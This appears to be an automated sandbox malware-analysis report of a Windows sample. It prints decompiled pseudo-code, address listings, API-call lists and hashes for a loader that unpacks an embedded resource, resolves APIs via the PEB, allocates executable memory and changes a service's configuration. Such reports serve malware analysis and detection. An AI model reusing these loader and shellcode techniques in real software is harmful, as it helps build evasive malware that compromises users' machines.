                                                          															}
                                                          															goto L81;
                                                          														}
                                                          														asm("sbb eax, eax");
                                                          														asm("sbb eax, 0xffffffff");
                                                          														goto L36;
                                                          													}
                                                          													goto L81;
                                                          												}
                                                          												asm("sbb eax, eax");
                                                          												asm("sbb eax, 0xffffffff");
                                                          												goto L28;
                                                          												L37:
                                                          												_t442 = Module32Next(_t525, _t557 + 0x278);
                                                          												__eflags = _t442;
                                                          											} while (_t442 != 0);
                                                          										}
                                                          										goto L38;
                                                          									}
                                                          									goto L81;
                                                          								}
                                                          								asm("sbb eax, eax");
                                                          								asm("sbb eax, 0xffffffff");
                                                          								goto L18;
                                                          							} else {
                                                          								L10:
                                                          								CloseHandle(_t525);
                                                          								return 0;
                                                          							}
                                                          							goto L81;
                                                          						}
                                                          						asm("sbb eax, eax");
                                                          						asm("sbb eax, 0xffffffff");
                                                          						goto L9;
                                                          					}
                                                          				}
                                                          				L81:
                                                          			}

































































































                                                          0x004019f0
                                                          0x004019f0
                                                          0x004019fd
                                                          0x00401a10
                                                          0x00401a15
                                                          0x00401a1a
                                                          0x00401a1f
                                                          0x00401a24
                                                          0x00401a29
                                                          0x00401a2e
                                                          0x00401a33
                                                          0x00401a38
                                                          0x00401a3d
                                                          0x00401a42
                                                          0x00401a47
                                                          0x00401a4c
                                                          0x00401a51
                                                          0x00401a56
                                                          0x00401a5b
                                                          0x00401a60
                                                          0x00401a65
                                                          0x00401a6a
                                                          0x00401a6f
                                                          0x00401a74
                                                          0x00401a79
                                                          0x00401a7e
                                                          0x00401a83
                                                          0x00401a88
                                                          0x00401a8d
                                                          0x00401a92
                                                          0x00401a97
                                                          0x00401a9c
                                                          0x00401aa1
                                                          0x00401aa6
                                                          0x00401aab
                                                          0x00401ab0
                                                          0x00401ab9
                                                          0x00401aba
                                                          0x00401abf
                                                          0x00401ac7
                                                          0x0040248d
                                                          0x0040248d
                                                          0x00402496
                                                          0x00401acd
                                                          0x00401ad6
                                                          0x00401ae2
                                                          0x00401ae6
                                                          0x00401af1
                                                          0x00401af6
                                                          0x00401afb
                                                          0x00401b00
                                                          0x00401b05
                                                          0x00401b0a
                                                          0x00401b0f
                                                          0x00401b14
                                                          0x00401b19
                                                          0x00401b1e
                                                          0x00401b23
                                                          0x00401b28
                                                          0x00401b2d
                                                          0x00401b32
                                                          0x00401b37
                                                          0x00401b3c
                                                          0x00401b41
                                                          0x00401b46
                                                          0x00401b4b
                                                          0x00401b50
                                                          0x00401b55
                                                          0x00401b5a
                                                          0x00401b5f
                                                          0x00401b64
                                                          0x00401b69
                                                          0x00401b6e
                                                          0x00401b73
                                                          0x00401b78
                                                          0x00401b7d
                                                          0x00401b85
                                                          0x00401b8d
                                                          0x00401b95
                                                          0x00401b9d
                                                          0x00401ba4
                                                          0x00401ba9
                                                          0x00401bae
                                                          0x00401bb3
                                                          0x00401bb8
                                                          0x00401bbd
                                                          0x00401bc2
                                                          0x00401bc7
                                                          0x00401bcc
                                                          0x00401bd1
                                                          0x00401bd6
                                                          0x00401bdb
                                                          0x00401be0
                                                          0x00401be5
                                                          0x00401bea
                                                          0x00401bef
                                                          0x00401bf4
                                                          0x00401bf9
                                                          0x00401bfe
                                                          0x00401c03
                                                          0x00401c08
                                                          0x00401c0d
                                                          0x00401c12
                                                          0x00401c17
                                                          0x00401c1c
                                                          0x00401c21
                                                          0x00401c26
                                                          0x00401c2b
                                                          0x00401c30
                                                          0x00401c35
                                                          0x00401c3a
                                                          0x00401c3f
                                                          0x00401c44
                                                          0x00401c48
                                                          0x00401c4f
                                                          0x00401dc3
                                                          0x00401dc4
                                                          0x00401de0
                                                          0x00401de2
                                                          0x00401de7
                                                          0x00401dec
                                                          0x00401df1
                                                          0x00401df6
                                                          0x00401dfb
                                                          0x00401e00
                                                          0x00401e05
                                                          0x00401e0a
                                                          0x00401e0f
                                                          0x00401e14
                                                          0x00401e19
                                                          0x00401e1e
                                                          0x00401e23
                                                          0x00401e28
                                                          0x00401e2d
                                                          0x00401e32
                                                          0x00401e37
                                                          0x00401e3c
                                                          0x00401e41
                                                          0x00401e46
                                                          0x00401e4b
                                                          0x00401e50
                                                          0x00401e55
                                                          0x00401e5a
                                                          0x00401e5f
                                                          0x00401e64
                                                          0x00401e69
                                                          0x00401e6e
                                                          0x00401e73
                                                          0x00401e78
                                                          0x00401e7d
                                                          0x00401e82
                                                          0x00401e86
                                                          0x00401e8b
                                                          0x00401e96
                                                          0x00401e9a
                                                          0x00401ea4
                                                          0x00401eaf
                                                          0x00401eba
                                                          0x00401ebf
                                                          0x00401ec4
                                                          0x00401ec6
                                                          0x00401ecb
                                                          0x00401ece
                                                          0x00401ed2
                                                          0x00401ed4
                                                          0x00401eef
                                                          0x00401ed6
                                                          0x00401edd
                                                          0x00401ee2
                                                          0x00401ee6
                                                          0x00401ee9
                                                          0x00401ee9
                                                          0x00401ef7
                                                          0x00401efc
                                                          0x00401f02
                                                          0x00401f08
                                                          0x00401f0c
                                                          0x00401f15
                                                          0x00401f18
                                                          0x00401f1a
                                                          0x00401f1c
                                                          0x00401f22
                                                          0x00401f22
                                                          0x00401f24
                                                          0x00401f28
                                                          0x00401f2f
                                                          0x00401f33
                                                          0x00401f33
                                                          0x00401f40
                                                          0x00401f45
                                                          0x00401f4a
                                                          0x00401f4b
                                                          0x00401f50
                                                          0x00401f58
                                                          0x00401f58
                                                          0x00401f58
                                                          0x00401f58
                                                          0x00401f33
                                                          0x00401f63
                                                          0x00401f63
                                                          0x00401f69
                                                          0x00401f72
                                                          0x00401f72
                                                          0x00401f72
                                                          0x00401f73
                                                          0x00401f75
                                                          0x00401f7b
                                                          0x00401f80
                                                          0x00401f81
                                                          0x00401f86
                                                          0x00401f86
                                                          0x00401f8c
                                                          0x00401f8d
                                                          0x00401f8d
                                                          0x00401f9d
                                                          0x00401fa2
                                                          0x00401fa6
                                                          0x00401fac
                                                          0x00401faf
                                                          0x00401fb6
                                                          0x00401fbf
                                                          0x00401fc4
                                                          0x00401fc8
                                                          0x00401fce
                                                          0x00401fd3
                                                          0x00401fe0
                                                          0x00401fec
                                                          0x00401ffe
                                                          0x00402001
                                                          0x00402006
                                                          0x0040200b
                                                          0x00402010
                                                          0x00402015
                                                          0x0040201a
                                                          0x0040201f
                                                          0x00402024
                                                          0x00402029
                                                          0x0040202e
                                                          0x00402033
                                                          0x00402038
                                                          0x0040203d
                                                          0x00402042
                                                          0x00402047
                                                          0x0040204c
                                                          0x00402051
                                                          0x00402056
                                                          0x0040205b
                                                          0x00402060
                                                          0x00402065
                                                          0x0040206a
                                                          0x0040206f
                                                          0x00402074
                                                          0x00402079
                                                          0x0040207e
                                                          0x00402083
                                                          0x00402088
                                                          0x0040208d
                                                          0x00402092
                                                          0x00402097
                                                          0x0040209c
                                                          0x004020a1
                                                          0x004020a5
                                                          0x004020aa
                                                          0x004020ae
                                                          0x004020b4
                                                          0x004020b6
                                                          0x004020bb
                                                          0x004020c0
                                                          0x004020c5
                                                          0x004020ca
                                                          0x004020cf
                                                          0x004020d4
                                                          0x004020e1
                                                          0x004020e6
                                                          0x004020eb
                                                          0x004020f0
                                                          0x004020f5
                                                          0x004020fa
                                                          0x004020ff
                                                          0x00402104
                                                          0x00402109
                                                          0x0040210e
                                                          0x00402113
                                                          0x00402118
                                                          0x0040211d
                                                          0x00402122
                                                          0x00402127
                                                          0x0040212c
                                                          0x00402131
                                                          0x00402136
                                                          0x0040213b
                                                          0x00402140
                                                          0x00402145
                                                          0x0040214a
                                                          0x0040214f
                                                          0x00402154
                                                          0x00402159
                                                          0x0040215e
                                                          0x00402163
                                                          0x00402167
                                                          0x0040216c
                                                          0x00402171
                                                          0x00402177
                                                          0x00402179
                                                          0x0040217c
                                                          0x0040217e
                                                          0x00402183
                                                          0x00402188
                                                          0x0040218f
                                                          0x00402196
                                                          0x0040219a
                                                          0x0040219e
                                                          0x004021a2
                                                          0x004021a4
                                                          0x004021bc
                                                          0x004021be
                                                          0x004021c0
                                                          0x004021c6
                                                          0x004021ca
                                                          0x004021e5
                                                          0x004021ec
                                                          0x004021f1
                                                          0x00402213
                                                          0x00402215
                                                          0x00402217
                                                          0x0040221d
                                                          0x00402239
                                                          0x0040223b
                                                          0x0040223d
                                                          0x00402243
                                                          0x0040224d
                                                          0x0040224f
                                                          0x00402251
                                                          0x00402260
                                                          0x00402264
                                                          0x00402269
                                                          0x00402277
                                                          0x0040227b
                                                          0x00402286
                                                          0x00402293
                                                          0x004022af
                                                          0x004022b1
                                                          0x004022b5
                                                          0x004022b7
                                                          0x004022be
                                                          0x004022be
                                                          0x004022d7
                                                          0x004022e8
                                                          0x004022ef
                                                          0x004022f6
                                                          0x00402300
                                                          0x00402304
                                                          0x00402308
                                                          0x00402315
                                                          0x0040231a
                                                          0x0040231e
                                                          0x00402324
                                                          0x00402328
                                                          0x0040232a
                                                          0x00402331
                                                          0x00402331
                                                          0x0040234e
                                                          0x00402350
                                                          0x00402352
                                                          0x00402355
                                                          0x00402355
                                                          0x0040235b
                                                          0x0040235f
                                                          0x00402361
                                                          0x00402368
                                                          0x00402368
                                                          0x0040236d
                                                          0x00402371
                                                          0x00402373
                                                          0x00402375
                                                          0x0040237b
                                                          0x0040237b
                                                          0x00402377
                                                          0x00402377
                                                          0x00402377
                                                          0x00402390
                                                          0x00402396
                                                          0x0040239c
                                                          0x004023a0
                                                          0x004023a2
                                                          0x004023a9
                                                          0x004023a9
                                                          0x004023ae
                                                          0x004023b2
                                                          0x004023b4
                                                          0x004023ba
                                                          0x004023ba
                                                          0x004023b6
                                                          0x004023b6
                                                          0x004023b6
                                                          0x004023ce
                                                          0x004023d1
                                                          0x004023d3
                                                          0x004023dd
                                                          0x004023ec
                                                          0x004023ef
                                                          0x004023fe
                                                          0x00402401
                                                          0x00402403
                                                          0x00402411
                                                          0x00402417
                                                          0x00402424
                                                          0x00402426
                                                          0x0040242a
                                                          0x0040242c
                                                          0x00402434
                                                          0x00402434
                                                          0x0040243a
                                                          0x0040243f
                                                          0x00402443
                                                          0x00402445
                                                          0x0040244d
                                                          0x0040244d
                                                          0x00402445
                                                          0x00402251
                                                          0x0040223d
                                                          0x0040244f
                                                          0x0040245d
                                                          0x0040245f
                                                          0x00402461
                                                          0x00402462
                                                          0x00402467
                                                          0x00402467
                                                          0x0040245f
                                                          0x004021ca
                                                          0x0040246a
                                                          0x0040246e
                                                          0x00402470
                                                          0x00402478
                                                          0x00402478
                                                          0x0040247a
                                                          0x0040247e
                                                          0x00402480
                                                          0x00402488
                                                          0x00402488
                                                          0x00402480
                                                          0x00000000
                                                          0x00401c55
                                                          0x00401c62
                                                          0x00401c67
                                                          0x00401c6a
                                                          0x00401c6c
                                                          0x00401c73
                                                          0x00401c73
                                                          0x00401c77
                                                          0x00000000
                                                          0x00000000
                                                          0x00401c7b
                                                          0x00401c8f
                                                          0x00401c8f
                                                          0x00401c7d
                                                          0x00401c7d
                                                          0x00401c83
                                                          0x00000000
                                                          0x00401c85
                                                          0x00401c85
                                                          0x00401c88
                                                          0x00401c8d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00401c8d
                                                          0x00401c83
                                                          0x00401c98
                                                          0x00401c9a
                                                          0x00401cbd
                                                          0x00401cc2
                                                          0x00401cc5
                                                          0x00401cc7
                                                          0x00401cd0
                                                          0x00401cd0
                                                          0x00401cd2
                                                          0x00401cd4
                                                          0x00000000
                                                          0x00000000
                                                          0x00401cd6
                                                          0x00401cd8
                                                          0x00401cec
                                                          0x00401cec
                                                          0x00401cda
                                                          0x00401cda
                                                          0x00401cdd
                                                          0x00401ce0
                                                          0x00000000
                                                          0x00401ce2
                                                          0x00401ce2
                                                          0x00401ce5
                                                          0x00401ce8
                                                          0x00401cea
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00401cea
                                                          0x00401ce0
                                                          0x00401cf5
                                                          0x00401cf5
                                                          0x00401cf7
                                                          0x00000000
                                                          0x00401cf9
                                                          0x00401d02
                                                          0x00401d07
                                                          0x00401d09
                                                          0x00401d10
                                                          0x00401d1d
                                                          0x00401d22
                                                          0x00401d25
                                                          0x00401d27
                                                          0x00401d30
                                                          0x00401d30
                                                          0x00401d32
                                                          0x00401d34
                                                          0x00000000
                                                          0x00000000
                                                          0x00401d36
                                                          0x00401d38
                                                          0x00401d4c
                                                          0x00401d4c
                                                          0x00401d3a
                                                          0x00401d3a
                                                          0x00401d3d
                                                          0x00401d40
                                                          0x00000000
                                                          0x00401d42
                                                          0x00401d42
                                                          0x00401d45
                                                          0x00401d48
                                                          0x00401d4a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00401d4a
                                                          0x00401d40
                                                          0x00401d55
                                                          0x00401d55
                                                          0x00401d57
                                                          0x00000000
                                                          0x00401d5d
                                                          0x00401d6a
                                                          0x00401d6f
                                                          0x00401d72
                                                          0x00401d74
                                                          0x00401d80
                                                          0x00401d80
                                                          0x00401d82
                                                          0x00401d84
                                                          0x00000000
                                                          0x00000000
                                                          0x00401d86
                                                          0x00401d88
                                                          0x00401d9c
                                                          0x00401d9c
                                                          0x00401d8a
                                                          0x00401d8a
                                                          0x00401d8d
                                                          0x00401d90
                                                          0x00000000
                                                          0x00401d92
                                                          0x00401d92
                                                          0x00401d95
                                                          0x00401d98
                                                          0x00401d9a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00401d9a
                                                          0x00401d90
                                                          0x00401da5
                                                          0x00401da5
                                                          0x00401da7
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00401da7
                                                          0x00401da0
                                                          0x00401da2
                                                          0x00000000
                                                          0x00401da2
                                                          0x00000000
                                                          0x00401d57
                                                          0x00401d50
                                                          0x00401d52
                                                          0x00000000
                                                          0x00401dad
                                                          0x00401db6
                                                          0x00401dbb
                                                          0x00401dbb
                                                          0x00401d10
                                                          0x00000000
                                                          0x00401d09
                                                          0x00000000
                                                          0x00401cf7
                                                          0x00401cf0
                                                          0x00401cf2
                                                          0x00000000
                                                          0x00401c9c
                                                          0x00401c9c
                                                          0x00401c9d
                                                          0x00401caf
                                                          0x00401caf
                                                          0x00000000
                                                          0x00401c9a
                                                          0x00401c93
                                                          0x00401c95
                                                          0x00000000
                                                          0x00401c95
                                                          0x00401c4f
                                                          0x00000000

                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 004019FD
                                                          • _getenv.LIBCMT ref: 00401ABA
                                                          • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                          • Module32First.KERNEL32 ref: 00401C48
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                          • Module32Next.KERNEL32 ref: 00401D02
                                                          • Module32Next.KERNEL32 ref: 00401DB6
                                                          • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                          • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                          • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                          • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                          • _malloc.LIBCMT ref: 00401EBA
                                                          • _memset.LIBCMT ref: 00401EDD
                                                          • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                          • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                          • API String ID: 1430744539-2962942730
                                                          • Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                          • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                          • Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                          • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 260 1fc092b-1fc0970 GetPEB 261 1fc0972-1fc0978 260->261 262 1fc098c-1fc098e 261->262 263 1fc097a-1fc098a call 1fc0d35 261->263 262->261 265 1fc0990 262->265 263->262 268 1fc0992-1fc0994 263->268 267 1fc0996-1fc0998 265->267 269 1fc0a3b-1fc0a3e 267->269 268->267 270 1fc099d-1fc09d3 268->270 271 1fc09dc-1fc09ee call 1fc0d0c 270->271 274 1fc09d5-1fc09d8 271->274 275 1fc09f0-1fc0a3a 271->275 274->271 275->269
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$GetProcAddress.$l
                                                          • API String ID: 0-2784972518
                                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                          • Instruction ID: 4f9cfe251a72ca159fbf4fc79e39fe33bf16e20f35afd1b8c11fb9f49f0634be
                                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                          • Instruction Fuzzy Hash: 993139B690060ADFDB10CF99C980AEDBBF5FF48724F14414AE441A7711DB71EA45CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 283 223a1a8-223a232 285 223a234-223a23e 283->285 286 223a26b-223a28d 283->286 285->286 287 223a240-223a242 285->287 293 223a2c9-223a2ea 286->293 294 223a28f-223a29c 286->294 288 223a265-223a268 287->288 289 223a244-223a24e 287->289 288->286 291 223a252-223a261 289->291 292 223a250 289->292 291->291 295 223a263 291->295 292->291 300 223a323-223a345 293->300 301 223a2ec-223a2f6 293->301 294->293 296 223a29e-223a2a0 294->296 295->288 298 223a2c3-223a2c6 296->298 299 223a2a2-223a2ac 296->299 298->293 302 223a2b0-223a2bf 299->302 303 223a2ae 299->303 309 223a381-223a3a2 300->309 310 223a347-223a354 300->310 301->300 305 223a2f8-223a2fa 301->305 302->302 304 223a2c1 302->304 303->302 304->298 306 223a31d-223a320 305->306 307 223a2fc-223a306 305->307 306->300 311 223a30a-223a319 307->311 312 223a308 307->312 320 223a3a4-223a3ae 309->320 321 223a3db-223a3fd 309->321 310->309 313 223a356-223a358 310->313 311->311 314 223a31b 311->314 312->311 315 223a37b-223a37e 313->315 316 223a35a-223a364 313->316 314->306 315->309 318 223a366 316->318 319 223a368-223a377 316->319 318->319 319->319 322 223a379 319->322 320->321 323 223a3b0-223a3b2 320->323 327 223a439-223a4b0 ChangeServiceConfigA 321->327 328 223a3ff-223a40c 321->328 322->315 325 223a3d5-223a3d8 323->325 326 223a3b4-223a3be 323->326 325->321 329 223a3c2-223a3d1 326->329 330 223a3c0 326->330 338 223a4b2-223a4b8 327->338 339 223a4b9-223a4f8 327->339 328->327 331 223a40e-223a410 328->331 329->329 332 223a3d3 329->332 330->329 333 223a433-223a436 331->333 334 223a412-223a41c 331->334 332->325 333->327 336 223a420-223a42f 334->336 337 223a41e 334->337 336->336 341 223a431 336->341 337->336 338->339 343 223a4fa-223a4fe 339->343 344 223a508-223a50c 339->344 341->333 343->344 345 223a500 343->345 346 223a50e-223a512 344->346 347 223a51c-223a520 344->347 345->344 346->347 348 223a514 346->348 349 223a522-223a526 347->349 350 223a530-223a534 347->350 348->347 349->350 351 223a528 349->351 352 223a536-223a53a 350->352 353 223a544-223a548 350->353 351->350 352->353 354 223a53c 352->354 355 223a54a-223a54e 353->355 356 223a558-223a55c 353->356 354->353 355->356 357 223a550 355->357 358 223a55e-223a562 356->358 359 223a56c 356->359 357->356 358->359 360 223a564 358->360 360->359
                                                          APIs
                                                          • ChangeServiceConfigA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 0223A4A0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414771851.0000000002230000.00000040.00000800.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2230000_ajAf.jbxd
                                                          Similarity
                                                          • API ID: ChangeConfigService
                                                          • String ID:
                                                          • API String ID: 3849694230-0
                                                          • Opcode ID: 11db13bf2c0f79db0f4dc11cb36cd97602b3491a5ed3eafc687fb2940b52cc56
                                                          • Instruction ID: 96e6211786edf2946aa9404fa65786b810de2943da72f4ec61ed2392a24725fd
                                                          • Opcode Fuzzy Hash: 11db13bf2c0f79db0f4dc11cb36cd97602b3491a5ed3eafc687fb2940b52cc56
                                                          • Instruction Fuzzy Hash: B7C12AB1D2061A8FDB11CFA8C8857AEBBF1FF44314F148639E895E6298D7759881CF81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 156 1fc003c-1fc0047 157 1fc004c-1fc0263 call 1fc0a3f call 1fc0e0f call 1fc0d90 VirtualAlloc 156->157 158 1fc0049 156->158 173 1fc028b-1fc0292 157->173 174 1fc0265-1fc0289 call 1fc0a69 157->174 158->157 176 1fc02a1-1fc02b0 173->176 178 1fc02ce-1fc03c2 VirtualProtect call 1fc0cce call 1fc0ce7 174->178 176->178 179 1fc02b2-1fc02cc 176->179 185 1fc03d1-1fc03e0 178->185 179->176 186 1fc0439-1fc04b8 VirtualFree 185->186 187 1fc03e2-1fc0437 call 1fc0ce7 185->187 189 1fc04be-1fc04cd 186->189 190 1fc05f4-1fc05fe 186->190 187->185 192 1fc04d3-1fc04dd 189->192 193 1fc077f-1fc0789 190->193 194 1fc0604-1fc060d 190->194 192->190 196 1fc04e3-1fc0505 192->196 197 1fc078b-1fc07a3 193->197 198 1fc07a6-1fc07b0 193->198 194->193 199 1fc0613-1fc0637 194->199 208 1fc0517-1fc0520 196->208 209 1fc0507-1fc0515 196->209 197->198 200 1fc086e-1fc08be LoadLibraryA 198->200 201 1fc07b6-1fc07cb 198->201 202 1fc063e-1fc0648 199->202 207 1fc08c7-1fc08f9 200->207 204 1fc07d2-1fc07d5 201->204 202->193 205 1fc064e-1fc065a 202->205 210 1fc0824-1fc0833 204->210 211 1fc07d7-1fc07e0 204->211 205->193 206 1fc0660-1fc066a 205->206 212 1fc067a-1fc0689 206->212 214 1fc08fb-1fc0901 207->214 215 1fc0902-1fc091d 207->215 216 1fc0526-1fc0547 208->216 209->216 213 1fc0839-1fc083c 210->213 217 1fc07e4-1fc0822 211->217 218 1fc07e2 211->218 219 1fc068f-1fc06b2 212->219 220 1fc0750-1fc077a 212->220 213->200 221 1fc083e-1fc0847 213->221 214->215 222 1fc054d-1fc0550 216->222 217->204 218->210 225 1fc06ef-1fc06fc 219->225 226 1fc06b4-1fc06ed 219->226 220->202 227 1fc0849 221->227 228 1fc084b-1fc086c 221->228 223 1fc0556-1fc056b 222->223 224 1fc05e0-1fc05ef 222->224 230 1fc056d 223->230 231 1fc056f-1fc057a 223->231 224->192 232 1fc06fe-1fc0748 225->232 233 1fc074b 225->233 226->225 227->200 228->213 230->224 234 1fc057c-1fc0599 231->234 235 1fc059b-1fc05bb 231->235 232->233 233->212 240 1fc05bd-1fc05db 234->240 235->240 240->222
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 01FC024D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: cess$kernel32.dll
                                                          • API String ID: 4275171209-1230238691
                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                          • Instruction ID: a5c574cd58e517a40efcf4c2b804d3ba0007d693fe7eaa4450cac5bff4cadf46
                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                          • Instruction Fuzzy Hash: 89526979A01229DFDB64CF58C984BACBBB1BF09304F1480D9E94DAB351DB31AA85DF14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 241 40af66-40af6e 242 40af7d-40af88 call 40b84d 241->242 245 40af70-40af7b call 40d2e3 242->245 246 40af8a-40af8b 242->246 245->242 249 40af8c-40af98 245->249 250 40afb3-40afca call 40af49 call 40cd39 249->250 251 40af9a-40afb2 call 40aefc call 40d2bd 249->251 251->250
                                                          C-Code - Quality: 63%
                                                          			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                          				signed int _v4;
                                                          				signed int _v16;
                                                          				signed int _v40;
                                                          				void* _t14;
                                                          				signed int _t15;
                                                          				intOrPtr* _t21;
                                                          				signed int _t24;
                                                          				void* _t28;
                                                          				void* _t39;
                                                          				void* _t40;
                                                          				signed int _t42;
                                                          				void* _t45;
                                                          				void* _t47;
                                                          				void* _t51;
                                                          
                                                          				_t40 = __edi;
                                                          				_t28 = __ebx;
                                                          				_t45 = _t51;
                                                          				while(1) {
                                                          					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
                                                          					if(_t14 != 0) {
                                                          						break;
                                                          					}
                                                          					_t15 = E0040D2E3(_a4);
                                                          					__eflags = _t15;
                                                          					if(_t15 == 0) {
                                                          						__eflags =  *0x423490 & 0x00000001;
                                                          						if(( *0x423490 & 0x00000001) == 0) {
                                                          							 *0x423490 =  *0x423490 | 0x00000001;
                                                          							__eflags =  *0x423490;
                                                          							E0040AEFC(0x423484);
                                                          							E0040D2BD( *0x423490, 0x41a704);
                                                          						}
                                                          						E0040AF49( &_v16, 0x423484);
                                                          						E0040CD39( &_v16, 0x420fa4);
                                                          						asm("int3");
                                                          						_t47 = _t45;
                                                          						_push(_t47);
                                                          						_push(0xc);
                                                          						_push(0x420ff8);
                                                          						_t19 = E0040E1D8(_t28, _t40, 0x423484);
                                                          						_t42 = _v4;
                                                          						__eflags = _t42;
                                                          						if(_t42 != 0) {
                                                          							__eflags =  *0x4250b0 - 3;
                                                          							if( *0x4250b0 != 3) {
                                                          								_push(_t42);
                                                          								goto L16;
                                                          							} else {
                                                          								E0040D6E0(_t28, 4);
                                                          								_v16 = _v16 & 0x00000000;
                                                          								_t24 = E0040D713(_t42);
                                                          								_v40 = _t24;
                                                          								__eflags = _t24;
                                                          								if(_t24 != 0) {
                                                          									_push(_t42);
                                                          									_push(_t24);
                                                          									E0040D743();
                                                          								}
                                                          								_v16 = 0xfffffffe;
                                                          								_t19 = E0040B70B();
                                                          								__eflags = _v40;
                                                          								if(_v40 == 0) {
                                                          									_push(_v4);
                                                          									L16:
                                                          									__eflags = HeapFree( *0x4234b4, 0, ??);
                                                          									if(__eflags == 0) {
                                                          										_t21 = E0040BFC1(__eflags);
                                                          										 *_t21 = E0040BF7F(GetLastError());
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						return E0040E21D(_t19);
                                                          					} else {
                                                          						continue;
                                                          					}
                                                          					L19:
                                                          				}
                                                          				return _t14;
                                                          				goto L19;
                                                          			}

















                                                          0x0040af66
                                                          0x0040af66
                                                          0x0040af69
                                                          0x0040af7d
                                                          0x0040af80
                                                          0x0040af88
                                                          0x00000000
                                                          0x00000000
                                                          0x0040af73
                                                          0x0040af79
                                                          0x0040af7b
                                                          0x0040af8c
                                                          0x0040af98
                                                          0x0040af9a
                                                          0x0040af9a
                                                          0x0040afa3
                                                          0x0040afad
                                                          0x0040afb2
                                                          0x0040afb7
                                                          0x0040afc5
                                                          0x0040afca
                                                          0x0040afd0
                                                          0x0040aec2
                                                          0x0040b6b5
                                                          0x0040b6b7
                                                          0x0040b6bc
                                                          0x0040b6c1
                                                          0x0040b6c4
                                                          0x0040b6c6
                                                          0x0040b6c8
                                                          0x0040b6cf
                                                          0x0040b714
                                                          0x00000000
                                                          0x0040b6d1
                                                          0x0040b6d3
                                                          0x0040b6d9
                                                          0x0040b6de
                                                          0x0040b6e4
                                                          0x0040b6e7
                                                          0x0040b6e9
                                                          0x0040b6eb
                                                          0x0040b6ec
                                                          0x0040b6ed
                                                          0x0040b6f3
                                                          0x0040b6f4
